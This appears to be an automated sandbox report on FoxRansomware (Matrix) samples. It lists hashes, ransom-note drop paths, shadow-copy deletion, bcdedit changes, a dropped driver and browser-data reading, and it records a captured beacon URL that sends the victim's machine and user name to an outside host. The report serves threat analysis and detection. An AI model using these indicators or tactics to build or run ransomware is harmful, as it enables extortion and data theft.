Overview
overview
10Static
static
3FoxRansomw...65.exe
windows7-x64
10FoxRansomw...65.exe
windows10-2004-x64
10FoxRansomw...a7.exe
windows7-x64
10FoxRansomw...a7.exe
windows10-2004-x64
10FoxRansomw...20.exe
windows7-x64
10FoxRansomw...20.exe
windows10-2004-x64
10FoxRansomw...0b.exe
windows7-x64
10FoxRansomw...0b.exe
windows10-2004-x64
10FoxRansomw...53.exe
windows7-x64
10FoxRansomw...53.exe
windows10-2004-x64
10FoxRansomw...b1.exe
windows7-x64
10FoxRansomw...b1.exe
windows10-2004-x64
10Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
03-04-2024 17:56
Static task
static1
Behavioral task
behavioral1
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win7-20240319-en
Behavioral task
behavioral12
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win10v2004-20240226-en
General
-
Target
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
-
Size
1.2MB
-
MD5
607d292bdcdde297252e002e613282ae
-
SHA1
0161d2dd582d064f7e7f50ccb43478ff0884916a
-
SHA256
0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65
-
SHA512
2bdc2ff857f9f52aac5071d3a695f7baf822a971969ba263ad03769c41af7916b558bada6bfe76fe78f730235a4ca5d2dd1cf3eaa2a59c5efef06af0a798acb8
-
SSDEEP
24576:J/SA+2lraRrjSJR5ezmT1dM9bB5slYQt2e8F/KpXcd:PXlOslYQt+5
Malware Config
Extracted
http://myexternalip.com/raw
Extracted
C:\Program Files\dotnet\host\fxr\8.0.0\#ANN_README#.rtf
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description flow ioc Process File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\nl\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\kn\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tk-TM\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\VisualElements\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{7710faaa-5fa1-4cd3-8174-88a1db6fa71b}\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338387\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pt-BR\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\ru\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\zh_CN\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ja\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\Pictures\Saved Pictures\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\ProgramData\Package Cache\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}v64.0.5329\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\Settings\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Sigma\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\te\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\PlayReadyCdm\_platform_specific\win_x64\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files\Java\jdk-1.8\include\win32\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files (x86)\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\de\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\zh-Hant\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ka\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Public\Libraries\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\el\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-557049126-2506969350-2798870634-1000\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\or-IN\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files\VideoLAN\VLC\plugins\d3d11\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_extractor\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files\VideoLAN\VLC\plugins\text_renderer\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files\Java\jre-1.8\lib\ext\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\AppData\Local\Microsoft\Credentials\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fi\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\swiftshader\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pl\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe HTTP URL 145 http://fredstat.000webhostapp.com/addrecord.php?apikey=anonapikey&compuser=ETDALPOV|Admin&sid=zBqk84EcHfc9th2U&phase=2545CEF051F62552|5340|3GB Process not Found File created C:\Program Files\Java\jdk-1.8\jre\bin\dtplugin\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\ProgramData\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\VisualElements\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\Videos\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Public\Pictures\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 5564 bcdedit.exe 5224 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 152 736 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS dwJakgr264.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" dwJakgr264.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 3 IoCs
pid Process 2580 NWN3tkpU.exe 4912 dwJakgr2.exe 1584 dwJakgr264.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 1096 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x0007000000023226-984.dat upx behavioral2/memory/4912-987-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/memory/4912-1747-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Drops desktop.ini file(s) 27 IoCs
description ioc Process File opened for modification C:\Users\Public\AccountPictures\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Users\Admin\Music\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files (x86)\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Users\Admin\Links\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Users\Public\Music\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Users\Public\Documents\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Users\Public\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Users\Public\Videos\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe -
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: dwJakgr264.exe File opened (read-only) \??\G: dwJakgr264.exe File opened (read-only) \??\H: dwJakgr264.exe File opened (read-only) \??\W: dwJakgr264.exe File opened (read-only) \??\Z: 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened (read-only) \??\U: 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened (read-only) \??\P: 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened (read-only) \??\I: 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened (read-only) \??\U: dwJakgr264.exe File opened (read-only) \??\V: dwJakgr264.exe File opened (read-only) \??\L: 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened (read-only) \??\T: dwJakgr264.exe File opened (read-only) \??\Q: dwJakgr264.exe File opened (read-only) \??\N: 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened (read-only) \??\M: 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened (read-only) \??\K: 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened (read-only) \??\G: 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened (read-only) \??\H: 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened (read-only) \??\I: dwJakgr264.exe File opened (read-only) \??\J: dwJakgr264.exe File opened (read-only) \??\K: dwJakgr264.exe File opened (read-only) \??\Y: 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened (read-only) \??\Q: 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened (read-only) \??\O: 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened (read-only) \??\J: 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened (read-only) \??\L: dwJakgr264.exe File opened (read-only) \??\Y: dwJakgr264.exe File opened (read-only) \??\Z: dwJakgr264.exe File opened (read-only) \??\E: 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened (read-only) \??\A: dwJakgr264.exe File opened (read-only) \??\B: dwJakgr264.exe File opened (read-only) \??\O: dwJakgr264.exe File opened (read-only) \??\T: 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened (read-only) \??\P: dwJakgr264.exe File opened (read-only) \??\R: dwJakgr264.exe File opened (read-only) \??\R: 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened (read-only) \??\M: dwJakgr264.exe File opened (read-only) \??\N: dwJakgr264.exe File opened (read-only) \??\S: dwJakgr264.exe File opened (read-only) \??\X: 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened (read-only) \??\W: 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened (read-only) \??\V: 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened (read-only) \??\S: 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened (read-only) \??\X: dwJakgr264.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 151 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\m4Ny8X8V.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\ja\Microsoft.VisualBasic.Forms.resources.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\pl\System.Windows.Input.Manipulations.resources.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\javacpl.cpl 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\System.Dynamic.Runtime.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\java.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Extensions\external_extensions.json.DATA 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\msedgewebview2.exe.sig.DATA 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.25\System.Diagnostics.FileVersionInfo.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\Java\jdk-1.8\THIRDPARTYLICENSEREADME.txt 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\sr.pak 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\WindowsFormsIntegration.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\zh-Hant\WindowsFormsIntegration.resources.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\appletviewer.exe 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\native2ascii.exe 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\DirectWriteForwarder.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\PresentationUI.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\codec\libscte27_plugin.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libvdr_plugin.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\EdgeUpdate.dat 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.25\System.Diagnostics.TextWriterTraceListener.dll 